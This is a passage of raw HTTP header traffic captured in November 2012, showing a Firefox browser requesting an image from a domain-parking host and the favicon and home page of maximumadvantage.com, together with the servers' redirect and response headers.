Server: GFE/2.0
GET /image_files/bg-blurbs-dm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 10926
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
 
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1

Date: Wed, 07 Nov 2012 08:55:24 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
 
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1

Date: Wed, 07 Nov 2012 08:55:26 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
GET / HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Wed, 07 Nov 2012 08:55:26 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked